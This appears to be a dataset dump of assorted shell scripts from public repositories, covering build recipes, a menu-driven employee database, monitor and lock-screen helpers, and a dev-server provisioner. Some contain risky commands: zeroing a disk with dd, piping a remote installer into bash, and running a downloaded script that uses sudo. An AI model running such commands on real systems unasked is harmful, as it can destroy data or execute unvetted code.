blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
fd6a86d7bbd499bb4b87b5df3aada2e2ca9d24dd
|
Shell
|
riga/cms-bot
|
/cvmfs/cvmfsdirtab.sh
|
UTF-8
| 825
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
#Shared files
for cmsdir in $@ ; do
echo "/${cmsdir}/share"
for x in cms/data-L1Trigger-L1TMuon cms/data-GeneratorInterface-EvtGenInterface 'cms/data-MagneticField-Interpolation/*' ; do
echo "/${cmsdir}/share/${x}"
done
#cmssw externals
echo "/${cmsdir}/*_*_*/external/*"
for x in blackhat boost cuda geant4 geant4-G4EMLOW herwigpp madgraph5amcatnlo py2-pippkgs py2-pippkgs_depscipy sherpa rivet; do
echo "/${cmsdir}/*_*_*/external/${x}/*"
done
#Some special directories
for x in cms lcg lcg/root ; do
echo "/${cmsdir}/*_*_*/${x}"
done
#for cmssw releases
for x in cmssw cmssw-patch ; do
echo "/${cmsdir}/*_*_*/cms/${x}/CMSSW_*/src"
echo "/${cmsdir}/*_*_*/cms/${x}/CMSSW_*"
done
#for cuda-compatible-runtime
echo "/${cmsdir}/cuda-compatible-runtime/v2*"
done
| true
|
b1965ab0aa0a552ba43736de00a7232b96dbe627
|
Shell
|
Bopzor/sib
|
/sib.sh
|
UTF-8
| 1,173
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
if [ $# -eq 0 ]
then
echo "This script need a video file to read"
echo -e "\nUsage:\nsib FILE \n"
exit 1
fi
# trap ctrl-c and call ctrl_c()
trap ctrl_c INT
SIB_SESSION="sib-session"
file="$1"
dirname=$(dirname "$file")
filename=$(basename "$file")
name="${filename%.*}"
pathname="$PWD/$dirname"
echo "Curently watching $name..."
function ctrl_c() {
output=$(curl -s "http://:${USER}@localhost:9090/requests/status.xml" | grep position)
regex="[0-1].[0-9]*"
[[ "$output" =~ $regex ]]
position="${BASH_REMATCH[0]}"
tmux kill-session -t "$SIB_SESSION"
if [[ "$position" > 0.95 ]]
then
mv "$pathname/$filename" "$pathname/.$filename"
for lang in '' '.fr' '.en'
do
if [[ -f "$pathname/$name${lang}.srt" ]]
then
mv "$pathname/$name${lang}.srt" "$pathname/.$name${lang}.srt"
fi
done
else
echo -e "\n$name hasn't been fully watched"
fi
exit "$?"
}
tmux new-session -d -s "$SIB_SESSION" vlc --extraintf http --http-password "$USER" --http-host localhost --http-port 9090 "$file"
# keep script running until ctrl-c
read -r -d '' _ </dev/tty
| true
|
82d62f09543d64b187ace8cc0b317e7f35dd1259
|
Shell
|
FSMaxB/lfs-me-repos
|
/7.6-systemd/XML-Parser-2.42_01
|
UTF-8
| 498
| 2.875
| 3
|
[] |
no_license
|
pkgbuild_version=5
pkgname=XML-Parser
pkgver=2.42_01
dependencies=(
"!$pkgname"
'expat'
'perl'
)
sources=(
"http://cpan.metacpan.org/authors/id/T/TO/TODDR/${pkgname}-${pkgver}.tar.gz"
)
sha1sums=(
2fd519619aa47c8c330365358c6783f4e5ed916c
)
lfs_me_prepare() {
tar -xf "${sources_dir}/${pkgname}-${pkgver}.tar.gz" -C "$build_dir"
cd "${build_dir}/${pkgname}-${pkgver}"
perl Makefile.PL
}
lfs_me_check() {
cd "${build_dir}/${pkgname}-${pkgver}"
make test
}
# vim:set syntax=sh et:
| true
|
ea00934d6eeca68dc7ab53b00913a66565b0eb9f
|
Shell
|
VinsUni/sdp-cytoscape3
|
/scripts/deploy.sh
|
UTF-8
| 275
| 2.84375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"/../
cd "${DIR}" || exit 1
. env.sh || exit 1
for app in `find "$DEV_APPS_DIR" -mindepth 1 -maxdepth 1 -type d`; do
env -i DEV_CY3_BUNDLE_DIR="$DEV_CY3_BUNDLE_DIR" bash "$app/scripts/deploy.sh"
done
| true
|
d63715575086f492a4d742f9da1e343f10685769
|
Shell
|
redshirtrob/binfiles
|
/dual-monitor.sh
|
UTF-8
| 347
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Move workspaces to HDMI-2
#
# usage: dual-monitor.sh
xrandr --output eDP-1 --auto --output HDMI-2 --auto --right-of eDP-1
workspaces=$(i3-msg -t get_workspaces | jq '.[] | select(.output == "HDMI-2") | .num' | tr '\n' ' ')
for workspace in $workspaces
do
i3-msg "workspace $workspace, move workspace to output HDMI-2"
done
| true
|
ada053c639d4d5a0cd36345604bd5695903769d5
|
Shell
|
JulianGoeltz/myConfigFiles
|
/toolbox/lockAlt.sh
|
UTF-8
| 526
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
# set -euo pipefail
# pausing dunst to not show notifs on lock screen
state_of_dunst=$(dunstctl is-paused)
dunstctl set-paused true
xrandr --output DP2-2 --mode 1920x1080 --same-as eDP1
/usr/bin/google-chrome-stable "/home/julgoe/Documents/apple_update_screen/macOSUpdates.html" --proxy-server="foopy:99" --kiosk 2>/dev/null
/home/julgoe/myConfigFiles/toolbox/screenSet.sh
# resuming if it wasn't paused before locking; but sleep first
sleep 3
[[ "$state_of_dunst" = 'false' ]] && dunstctl set-paused false
| true
|
21b36b4a9689b58e0481a1e694b345525d26c4f0
|
Shell
|
Karkanius/MIECT
|
/Ano_2/LFA/antlr4-bin-v5/bin/antlr4
|
UTF-8
| 197
| 2.859375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
if [ -z "$ANTLR4_PATH" ]; then
java -ea org.antlr.v4.Tool $*
else
java -ea -cp .:`ls --color=never $ANTLR4_PATH/antlr-4*-complete.jar | tail -1` org.antlr.v4.Tool $*
fi
exit $?
| true
|
02204980ff3b3060a17f6abd2365b39ca70bf2e4
|
Shell
|
strayfluxinteractive/strayflux
|
/tools/dependencies.sh
|
UTF-8
| 874
| 3.125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Exit immediately if a command exits with a non-zero status
set -e
# Print commands and their arguments as they are executed.
set -x
# Bii code
wget http://apt.biicode.com/install.sh && chmod +x install.sh && ./install.sh
rm install.sh
# G++
sudo add-apt-repository ppa:ubuntu-toolchain-r/test -y
sudo apt-get update -qq
if [ "$CXX" = "g++" ]; then sudo apt-get install -qq g++-4.8; fi
if [ "$CXX" = "g++" ]; then export CXX="g++-4.8" CC="gcc-4.8"; fi
sudo update-alternatives --install /usr/bin/g++ g++ /usr/bin/g++-4.8 90
sudo apt-get install gcc
sudo update-alternatives --install /usr/bin/gcov gcov /usr/bin/gcov-4.8 90
# Cmake
wget https://s3.amazonaws.com/biibinaries/thirdparty/cmake-3.0.2-Linux-64.tar.gz
tar -xzf cmake-3.0.2-Linux-64.tar.gz
sudo cp -fR cmake-3.0.2-Linux-64/* /usr
rm -rf cmake-3.0.2-Linux-64
rm cmake-3.0.2-Linux-64.tar.gz
| true
|
2d8af30f61692626d34f499960db12be19eb9e26
|
Shell
|
xzpeter/small-stuffs
|
/e
|
UTF-8
| 635
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
# we have to use sed working both on Mac OS and Linux.
if uname | grep -qiE 'darwin|freebsd'; then
# this is MacOS
sed_prm=-E
elif uname | grep -qi linux; then
sed_prm=-r
else
echo "Unknown system!"
exit 1
fi
# we should support things like:
# $ e file.c:14
# this should edit file.c with line 14
prms=`echo $@ | sed $sed_prm 's/([^ :]+):([0-9]+)/+\2 \1/g'`
function emacs_running ()
{
pgrep -x emacs >/dev/null
}
emacsclient -a emacs $prms >/dev/null 2>&1 &
# there are possibly one chance to fail, that is $#==0. Let's start emacs
# if no emacs running.
if ! emacs_running && [[ $# == 0 ]] ; then
emacs &
fi
| true
|
9434132b7ae27a0f77d50c0e571b113d84c95e11
|
Shell
|
8688Add/OpenWrt-CI
|
/x86/myautocore/files/x86/autocore
|
UTF-8
| 1,272
| 2.75
| 3
|
[] |
permissive
|
#!/bin/sh /etc/rc.common
# Copyright (C) 2017 lean <coolsnowwolf@gmail.com>
START=99
start()
{
rfc=4096
cc=$(grep -c processor /proc/cpuinfo)
rsfe=$(echo $cc*$rfc | bc)
sysctl -w net.core.rps_sock_flow_entries=$rsfe >/dev/null
for fileRps in $(ls /sys/class/net/eth*/queues/rx-*/rps_cpus)
do
echo $cc > $fileRps
done
for fileRfc in $(ls /sys/class/net/eth*/queues/rx-*/rps_flow_cnt)
do
echo $rfc > $fileRfc
done
uci set network.@globals[0].packet_steering=1
uci commit network
g=$(dmesg | grep 'DMI:' | awk -F ', B' '{print $1 }' | awk -F ':' '{print $2 }')
[ -d /tmp/sysinfo ] || mkdir -p /tmp/sysinfo
echo $g > /tmp/sysinfo/model
for c in $(ip address | awk -F ': ' '/eth[0-9]+/ {print $2}' | awk -F '@' {'print $1'} | awk '{ if ( length($0) <=7 ) print $0}' | xargs)
do
ethtool -K $c rx-checksum on >/dev/null 2>&1
ethtool -K $c tx-checksum-ip-generic on >/dev/null 2>&1 || (
ethtool -K $c tx-checksum-ipv4 on >/dev/null 2>&1
ethtool -K $c tx-checksum-ipv6 on >/dev/null 2>&1)
ethtool -K $c tx-scatter-gather on >/dev/null 2>&1
ethtool -K $c gso on >/dev/null 2>&1
ethtool -K $c tso on >/dev/null 2>&1
ethtool -K $c ufo on >/dev/null 2>&1
done
[ -f /etc/index.htm ] && mv /etc/index.htm /usr/lib/lua/luci/view/admin_status/index.htm
}
| true
|
776cc6c476a5bc78fc952cd6b3c6c13d513085d8
|
Shell
|
xenserver/planex-release
|
/build.sh
|
UTF-8
| 955
| 3.171875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -xe
build_release() {
DIST_NAME=$1
DIST_VERSION=$2
RELEASE_TYPE=$3
sed -e "s/@RELEASE_TYPE@/${RELEASE_TYPE}/g" SPECS/planex-release.spec.in > SPECS/planex-${RELEASE_TYPE}.spec
sed -e "s/@DIST@/${DIST_NAME}/g" -e "s/@DIST_VERSION@/${DIST_VERSION}/g" -e "s/@RELEASE_TYPE@/${RELEASE_TYPE}/g" SOURCES/planex.repo.in > SOURCES/planex-${RELEASE_TYPE}.repo
rpmbuild --define "_topdir ${PWD}" --define "version ${DIST_VERSION}" --define "dist_name ${DIST_NAME}" --bb SPECS/planex-${RELEASE_TYPE}.spec
mkdir -p ${RELEASE_TYPE}/rpm/${DIST_NAME}/${DIST_VERSION}
mv RPMS/noarch/planex-${RELEASE_TYPE}-${DIST_VERSION}-1.noarch.rpm ${RELEASE_TYPE}/rpm/${DIST_NAME}
createrepo ${RELEASE_TYPE}/rpm/$DIST_NAME/${DIST_VERSION}
}
build_release fedora 23 release
build_release fedora 24 release
build_release el 7 release
build_release fedora 23 unstable
build_release fedora 24 unstable
build_release el 7 unstable
| true
|
cd7a1175c1fec81ca041189dead5e7fede110e49
|
Shell
|
DEVPARMAR06/lucifer
|
/DBMS.sh
|
UTF-8
| 7,108
| 3.171875
| 3
|
[
"Apache-2.0"
] |
permissive
|
echo "--> DBMS Functions <--"
while [ true ]
do
echo "\n1.View All \n2.Insert \n3.Search \n4.Delete \n5.Update \n6.Sort \n7.Exit"
echo "Enter Choice: "
read c
while [ -z $c ]
do
"Enter Choice: "
read c
done
#-----------------------------------------------------------------------
if [ $c -eq 1 ]
then
cat pr-8ans
#-----------------------------------------------------------------------
elif [ $c -eq 2 ]
then
while [ true ]
do
echo "Enter Employee Id :"
read eid
while [ -z $eid ]
do
echo "Enter Employee Id :"
read eid
done
cut -d"|" -f1 pr-8ans | cat > try123
b=$(grep -n -w -i $eid try123 | cut -f1 -d":")
if [ -z $b ]
then
break
else
echo "--> Enter Unique Employee Id <--"
fi
done
echo "Employee Name:"
read ename
while [ -z $ename ]
do
echo "Employee Name:"
read ename
done
echo "Employee Department :"
read edep
while [ -z $edep ]
do
echo "Employee Department :"
read edep
done
echo "Employee Salary :"
read esal
while [ true ]
do
if [ -z $esal ]
then
echo "Employee Salary :"
read esal
elif [ $esal -le 0 ]
then
echo "Employee Salary :"
read esal
else
break
fi
done
echo "$eid | $ename | $edep | $esal" >> pr-8ans
#-----------------------------------------------------------------------
elif [ $c -eq 3 ]
then
echo "\n1. Search By Employee Id \n2. Search By Name \n3. Search By Department \n4. Search By Salary "
read choice
if [ $choice -eq 1 ]
then
cut -d"|" -f1 pr-8ans | cat > try123
echo "Enter Employee Id :"
read db
while [ -z $db ]
do
echo "Enter Employee Id :"
read db
done
b=$(grep -n -w -i $db try123 | cut -f1 -d":")
if [ -z $b ]
then
echo "Not Found"
else
len=$(wc -l < pr-8ans)
i=1
cat pr-8ans | while read line
do
if [ $i -eq $b ]
then
echo $line
fi
i=`expr $i + 1`
done
fi
elif [ $choice -eq 2 ]
then
cut -d"|" -f2 pr-8ans | cat > try123
echo "Enter Name :"
read ena
while [ -z $ena ]
do
echo "Enter Name :"
read ena
done
grep -n -i -w $ena try123 | cut -f1 -d":" | cat > emp
l=$(wc -l < emp)
if [ $l -eq 0 ]
then
echo "Not Found"
else
len=$(wc -l < pr-8ans)
i=1
cat pr-8ans | while read line
do
cat emp | while read j
do
if [ $i -eq $j ]
then
echo $line
fi
done
i=`expr $i + 1`
done
fi
elif [ $choice -eq 3 ]
then
cut -d"|" -f3 pr-8ans | cat > try123
echo "Employee Department"
read Ed
while [ -z $Ed ]
do
echo "Employee Department:"
read Ed
done
grep -n -i -w $Ed try123 | cut -f1 -d":" | cat > emp
l=$(wc -l < emp)
if [ $l -eq 0 ]
then
echo "Not Found"
else
len=$(wc -l < pr-8ans)
i=1
cat pr-8ans | while read line
do
cat emp | while read j
do
if [ $i -eq $j ]
then
echo $line
fi
done
i=`expr $i + 1`
done
fi
elif [ $choice -eq 4 ]
then
cut -d"|" -f4 pr-8ans | cat > try123
echo "Employee Salary:"
read sa
while [ -z $sa ]
do
echo "Employee Salary:"
read sa
done
grep -n -i -w $sa try123 | cut -f1 -d":" | cat > emp
l=$(wc -l < emp)
if [ $l -eq 0 ]
then
echo "Not Found"
else
len=$(wc -l < pr-8ans)
i=1
cat pr-8ans | while read line
do
cat emp | while read j
do
if [ $i -eq $j ]
then
echo $line
fi
done
i=`expr $i + 1`
done
fi
else
echo "--> Wrong Choice <--"
fi
#-----------------------------------------------------------------------
elif [ $c -eq 4 ]
then
cut -d"|" -f1 pr-8ans | cat > try123
echo "Enter Employee Id :"
read db
while [ -z $db ]
do
echo "Enter Employee Id :"
read db
done
b=$(grep -n -w -i $db try123 | cut -f1 -d":")
if [ -z $b ]
then
echo "Not Found"
else
touch pr-8-delete
len=$(wc -l < pr-8ans)
i=1
cat pr-8ans | while read line
do
if [ $i -ne $b ]
then
echo "$line" >> pr-8-delete
fi
i=`expr $i + 1`
done
cat pr-8-delete > pr-8ans
rm pr-8-delete
fi
#-----------------------------------------------------------------------
elif [ $c -eq 5 ]
then
cut -d"|" -f1 pr-8ans | cat > try123
echo "Enter Employee Id :"
read db
while [ -z $db ]
do
echo "Enter Employee Id :"
read db
done
b=$(grep -n -w -i $db try123 | cut -f1 -d":")
if [ -z $b ]
then
echo "Not Found"
else
touch pr-8-delete
#len=$(wc -l < pr-8ans)
#i=1
x=0
#touch edit
#cat pr-8ans | while read line
#do
#if [ "$i" -eq "$b" ]
#then
#echo $line >> edit
#uename=$(cut -d"|" -f2 edit)
#uedep=$(cut -d"|" -f3 edit)
#uesal=$(cut -d"|" -f4 edit)
#fi
#i=`expr $i + 1`
#done
echo "\n1.Update Name \n2.Update Department \n3.Update Salary"
read va
if [ $va -eq 1 ]
then
echo "Employee Name:"
read uename
while [ -z $uename ]
do
echo "Employee Name:"
read uename
done
uedep=$(grep -i -w $db pr-8ans | cut -f3 -d"|")
uesal=$(grep -i -w $db pr-8ans | cut -f4 -d"|")
elif [ $va -eq 2 ]
then
echo "Employee Department :"
read uedep
while [ -z $uedep ]
do
echo "Employee Department :"
read uedep
done
uename=$(grep -i -w $db pr-8ans | cut -f2 -d"|")
uesal=$(grep -i -w $db pr-8ans | cut -f4 -d"|")
elif [ $va -eq 3 ]
then
echo "Employee Salary :"
read uesal
while [ true ]
do
if [ -z $uesal ]
then
echo "Employee Salary :"
read uesal
elif [ $uesal -le 0 ]
then
echo "Employee Salary :"
read uesal
else
break
fi
done
uedep=$(grep -i -w $db pr-8ans | cut -f3 -d"|")
uename=$(grep -i -w $db pr-8ans | cut -f2 -d"|")
else
echo "--> Wrong Choice <--"
rm pr-8-delete
#rm edit
x=1
fi
i=1
if [ $x -eq 0 ]
then
cat pr-8ans | while read line
do
if [ $i -ne $b ]
then
echo "$line" >> pr-8-delete
else
echo "$db | $uename | $uedep | $uesal" >> pr-8-delete
fi
i=`expr $i + 1`
done
cat pr-8-delete > pr-8ans
rm pr-8-delete
#rm edit
fi
fi
#-----------------------------------------------------------------------
elif [ $c -eq 6 ]
then
touch sorting
echo "\n1. Sort By Employee Id \n2. Sort By Name \n3. Sort By Department \n4. Sort By Salary "
read cho
if [ $cho -eq 1 ]
then
echo "---------------------------------------------------"
sort -t "|" -k 1 pr-8ans | cat > sorting
cat sorting
echo "---------------------------------------------------"
echo "\n You Want To Update Sorted Data In Database? 1(YES)/0(NO)"
read l
if [ $l -eq 1 ]
then
cat sorting > pr-8ans
fi
elif [ $cho -eq 2 ]
then
echo "---------------------------------------------------"
sort -t "|" -k 2 pr-8ans | cat > sorting
cat sorting
echo "---------------------------------------------------"
echo "\n You Want To Update Sorted Data In Database? 1(YES)/0(NO)"
read l
if [ $l -eq 1 ]
then
cat sorting > pr-8ans
fi
elif [ $cho -eq 3 ]
then
echo "---------------------------------------------------"
sort -t "|" -k 3 pr-8ans | cat > sorting
cat sorting
echo "---------------------------------------------------"
echo "\n You Want To Update Sorted Data In Database? 1(YES)/0(NO)"
read l
if [ $l -eq 1 ]
then
cat sorting > pr-8ans
fi
elif [ $cho -eq 4 ]
then
echo "---------------------------------------------------"
sort -n -t "|" -k 4 pr-8ans | cat > sorting
cat sorting
echo "---------------------------------------------------"
echo "\n You Want To Update Sorted Data In Database? 1(YES)/0(NO)"
read l
if [ $l -eq 1 ]
then
cat sorting > pr-8ans
fi
else
echo "--> Wrong Choice <--"
fi
rm -r sorting
#-----------------------------------------------------------------------
elif [ $c -eq 7 ]
then
echo "---> Thanks For Using <---"
break
else
echo "---> Wrong Choice <---"
fi
#-----------------------------------------------------------------------
done
| true
|
7d1867505fbb72d9d2381255959399d60e30205a
|
Shell
|
rapidsai/dask-cudf
|
/ci/release/update-version.sh
|
UTF-8
| 1,500
| 4.25
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#############################
# dask-cudf Version Updater #
#############################
## Usage
# bash update-version.sh <type>
# where <type> is either `major`, `minor`, `patch`
set -e
# Grab argument for release type
RELEASE_TYPE=$1
# Get current version and calculate next versions
CURRENT_TAG=`git tag | grep -xE 'v[0-9\.]+' | sort --version-sort | tail -n 1 | tr -d 'v'`
CURRENT_MAJOR=`echo $CURRENT_TAG | awk '{split($0, a, "."); print a[1]}'`
CURRENT_MINOR=`echo $CURRENT_TAG | awk '{split($0, a, "."); print a[2]}'`
CURRENT_PATCH=`echo $CURRENT_TAG | awk '{split($0, a, "."); print a[3]}'`
NEXT_MAJOR=$((CURRENT_MAJOR + 1))
NEXT_MINOR=$((CURRENT_MINOR + 1))
NEXT_PATCH=$((CURRENT_PATCH + 1))
NEXT_FULL_TAG=""
NEXT_SHORT_TAG=""
# Determine release type
if [ "$RELEASE_TYPE" == "major" ]; then
NEXT_FULL_TAG="${NEXT_MAJOR}.0.0"
NEXT_SHORT_TAG="${NEXT_MAJOR}.0"
elif [ "$RELEASE_TYPE" == "minor" ]; then
NEXT_FULL_TAG="${CURRENT_MAJOR}.${NEXT_MINOR}.0"
NEXT_SHORT_TAG="${CURRENT_MAJOR}.${NEXT_MINOR}"
elif [ "$RELEASE_TYPE" == "patch" ]; then
NEXT_FULL_TAG="${CURRENT_MAJOR}.${CURRENT_MINOR}.${NEXT_PATCH}"
NEXT_SHORT_TAG="${CURRENT_MAJOR}.${NEXT_MINOR}"
else
echo "Incorrect release type; use 'major', 'minor', or 'patch' as an argument"
exit 1
fi
echo "Preparing '$RELEASE_TYPE' release [$CURRENT_TAG -> $NEXT_FULL_TAG]"
# Inplace sed replace; workaround for Linux and Mac
function sed_runner() {
sed -i.bak ''"$1"'' $2 && rm -f ${2}.bak
}
#No-op
| true
|
31f8d415a79dcd01c2190bea98d98ff1d462a699
|
Shell
|
hakoerber/wine-scripts
|
/splinter-cell-chaos-theory/scripts/start.bash
|
UTF-8
| 355
| 2.546875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
source "$(dirname $0)/../../common/settings.bash"
source "$(dirname $0)/info.bash"
export INFOFILE="$(dirname $0)/info.bash"
export EXECPATH="drive_c/Program Files/Ubisoft/Tom Clancy's Splinter Cell Chaos Theory/System/splintercell3.exe"
export OPTIONS="explorer /desktop=d1,1920x1080"
"$STARTSCRIPT" "$INFOFILE" "$EXECPATH" "$OPTIONS"
| true
|
fde0eb3a45b3d6aa87484889e7ee886b3d59b84f
|
Shell
|
deepaksrivastav/promote-to
|
/build.sh
|
UTF-8
| 843
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
set -o pipefail
IFS=$'\n\t'
DOCKER_SOCKET=/var/run/docker.sock
if [ ! -e "${DOCKER_SOCKET}" ]; then
echo "Docker socket missing at ${DOCKER_SOCKET}"
exit 1
fi
if [ -n "${SOURCE_IMAGE}" ]; then
SOURCE_TAG="${SOURCE_REGISTRY}/${SOURCE_IMAGE}"
fi
if [ -n "${TARGET_IMAGE}" ]; then
TARGET_TAG="${TARGET_REGISTRY}/${TARGET_IMAGE}"
fi
ls -lr /var/run/secrets/openshift.io/
if [[ -d /var/run/secrets/openshift.io/pull ]] && [[ ! -e /root/.dockercfg ]]; then
cp /var/run/secrets/openshift.io/pull/.dockercfg /root/.dockercfg
fi
docker pull "${SOURCE_TAG}"
docker tag -f "${SOURCE_TAG}" "${TARGET_TAG}"
cp /tmp/secret1/.dockercfg /root/.dockercfg
if [ -d /tmp/secret1/.dockercfg ]; then
echo "Found push secret"
cp /tmp/secret1/.dockercfg /root/.dockercfg
fi
docker push "${TARGET_TAG}"
docker rmi "${TARGET_TAG}"
| true
|
7a93d65a6295a6678c396c7fac5ee4fcc937e191
|
Shell
|
rokerkony/angular-critical-ie11-bug
|
/scripts/serveDistLocallyNotMinified.sh
|
UTF-8
| 521
| 3.359375
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
_NAME="serve locally:"
## make sure you have clean exit for npm run and CI
echo "$_NAME checking script dependencies"
SCRIPTNAME=${0##*/}
NPM=$(command -v npm) || { echo "$_NAME $SCRIPTNAME: npm is not available"; exit 1; }
echo "$_NAME building a project"
${NPM} run build:notMinified
rm -rf _locally-running/
rm -rf dist/_locally-running/
cp -R dist/ _locally-running/
mv _locally-running dist/_locally-running/
echo "$_NAME serving"
cd dist/_locally-running/
../../node_modules/.bin/http-server
| true
|
1e83adfafda244f322c704a52223555d0896a551
|
Shell
|
bOmBeLq/symfony-demo
|
/docker.sh
|
UTF-8
| 148
| 2.953125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
if [[ -z "$@" ]] ; then
TO_EXEC='bash';
else
TO_EXEC=$@;
fi
docker exec -it -u symfony-demo symfony-demo-php ${TO_EXEC}
| true
|
e55620f09de9987df1e82273afcfd56e668e2f50
|
Shell
|
benkelly/dev-environment
|
/config_server.sh
|
UTF-8
| 3,075
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/bash
function fix_disk {
echo "Arranging data disk"
echo "Un mounting data disk"
umount /dev/sdb1
echo "Wiping diskk"
dd if=/dev/zero of=/dev/sdb bs=1024 count=8096
echo "Creating partition table"
parted -s /dev/sdb mktable gpt
echo "Creating partition"
parted -s /dev/sdb mkpart primary ext4 0% 100%
echo "Reading partition tables"
partprobe
echo "Formatting disk with ext4"
mkfs.ext4 /dev/sdb1
echo "Mounting disk"
mount /dev/sdb1
}
function create_links {
echo "Creating folders and symlinks for ${real_user} and ${HOME}"
rm -rf ${HOME}/go /var/lib/docker ${HOME}/projects
mkdir /mnt/docker
mkdir /mnt/go
mkdir /mnt/projects
chown ${real_user}:${real_user} /mnt/go /mnt/projects
ln -s /mnt/go ${HOME}/go
ln -s /mnt/docker /var/lib/docker
ln -s /mnt/projects ${HOME}/projects
chown -h ${real_user}:${real_user} ${HOME}/go ${HOME}/projects
}
function install_go {
apt-get -y install unzip
filename='go1.13.4.linux-amd64.tar.gz'
wget "https://dl.google.com/go/${filename}"
tar -C /usr/local -xzf ${filename}
echo 'export GOPATH=$HOME/go' >> ~/.bash_profile
echo 'export GOROOT=/usr/local/go' >> ~/.bash_profile
echo 'export PATH=$GOPATH/bin:$GOROOT/bin:$PATH' >> ~/.bash_profile
}
function install_terraform {
filename='terraform_0.12.16_linux_amd64.zip'
wget "https://releases.hashicorp.com/terraform/0.12.16/${filename}"
unzip ${filename}
mv terraform /usr/local/bin
}
function install_az_cli {
curl -sL https://aka.ms/InstallAzureCLIDeb | bash
}
function install_docker_repo {
apt-get -y install \
apt-transport-https \
ca-certificates \
curl \
gnupg-agent \
software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository \
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
}
function install_docker {
apt-get -y install docker-ce docker-ce-cli containerd.io
usermod -aG docker ${real_user}
}
function install_systools {
apt-get -y install iftop iotop sysstat
}
function install_chrome {
apt-get -y install fonts-liberation libappindicator3-1 libasound2 libatk-bridge2.0-0 libatspi2.0-0 libgtk-3-0 libnspr4 libnss3 libx11-xcb1 xdg-utils libxss1
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
dpkg -i google-chrome*.deb
}
function install_dev_tools {
apt-get -y install make gcc
}
function install_all {
apt-get update -y
install_docker_repo
apt-get update -y
install_systools
install_docker
install_go
install_terraform
install_az_cli
install_chrome
install_dev_tools
}
set -e
if [ "$1" != "" ]; then
real_user="$1"
HOME="/home/${real_user}"
else
echo "The script must be invoked with the username as first argument"
exit 1
fi
fix_disk
create_links
install_all
| true
|
ce630ad05b86e6302bcc86eb72e88adc33a3a69e
|
Shell
|
JRasmusBm/dotfiles
|
/layouts/home
|
UTF-8
| 140
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/sh
set -e
_layout() {
if test "$1" = 'supported'; then
xrandr | ggrep -q 'HDMI-1 connected'
exit $?
fi
}
_layout "$@"
| true
|
1c766075396003331306f877af47833d31afa405
|
Shell
|
boklm/mageia-puppet
|
/modules/buildsystem/templates/binrepo/wrapper.upload-bin
|
UTF-8
| 586
| 3
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
binrepouser="<%= scope.lookupvar('buildsystem::var::binrepo::login') %>"
uploadbinpath="<%= scope.lookupvar('buildsystem::var::binrepo::uploadbinpath') %>"
packagerscommittersgroup="<%= scope.lookupvar('buildsystem::var::groups::packagers_committers') %>"
function isingroup()
{
grp="$1"
for group in `groups`
do if [ "$grp" = "$group" ]
then
return 0
fi
done
return 1
}
if ! isingroup "$packagerscommittersgroup"
then
echo "You are not in $packagerscommittersgroup group."
exit 1
fi
sudo -u "$binrepouser" "$uploadbinpath" $(whoami) $@
| true
|
fc8bb1f0123076632a4e1807f8df09677f4c2dc8
|
Shell
|
DanHam/packer-testing
|
/vmware/iso/centos/scripts/00-remove-extraneous-packages.sh
|
UTF-8
| 1,573
| 3.640625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#
# Remove extraneous packages installed by Anaconda
#
# Set verbose/quiet output based on env var configured in Packer template
[[ "$DEBUG" = true ]] && REDIRECT="/dev/stdout" || REDIRECT="/dev/null"
# Logging for Packer
echo "Removing extraneous packages installed by Anaconda..."
# The following packages are installed by Anaconda regardless of any
# attempts to exclude them in the %packages section. In short Anaconda
# seems to ignore options and settings in the %packages section and does
# its own thing regardless...
PACKAGE_LIST=(
atk
atkmm
btrfs-progs
cairo
cairomm
cups-libs
e2fsprogs
e2fsprogs-libs
gdk-pixbuf2
graphite2
gtk2
gtkmm24
harfbuzz
hicolor-icon-theme
jasper-libs
jbigkit-libs
libX11
libXcomposite
libXcursor
libXdamage
libXext
libXfixes
libXft
libXi
libXinerama
libXrandr
libXrender
libXtst
libXxf86vm
libdrm
libjpeg-turbo
libpng
libss
libthai
libtiff
libxcb
libxshmfence
mesa-libEGL
mesa-libGL
mesa-libgbm
mesa-libglapi
open-vm-tools
open-vm-tools-desktop
pango
pangomm
pixman
)
# Depending, some packages listed may not be on the system so build a list
# to avoid error messages
REMOVE_LIST=()
for PACKAGE in ${PACKAGE_LIST[@]}
do
rpm -q ${PACKAGE} &>/dev/null
[[ $? -eq 0 ]] && REMOVE_LIST+=(${PACKAGE})
done
# Remove packages
yum -C -y remove --setopt="clean_requirements_on_remove=1" \
${REMOVE_LIST[@]} > $REDIRECT
exit 0
| true
|
0157192e1192764c475d4b1b3e76815efa8625d7
|
Shell
|
particleman314/ShellLibrary
|
/test/stringmgt/repeat.sh
|
UTF-8
| 300
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
answer=$( repeat )
assert_failure $?
answer=$( repeat --repeat-char '|' )
assert_failure $?
answer=$( repeat --repeat-char '+' --number-times 0 )
assert_failure $?
answer=$( repeat --repeat-char '+' --number-times 10 )
assert_success $?
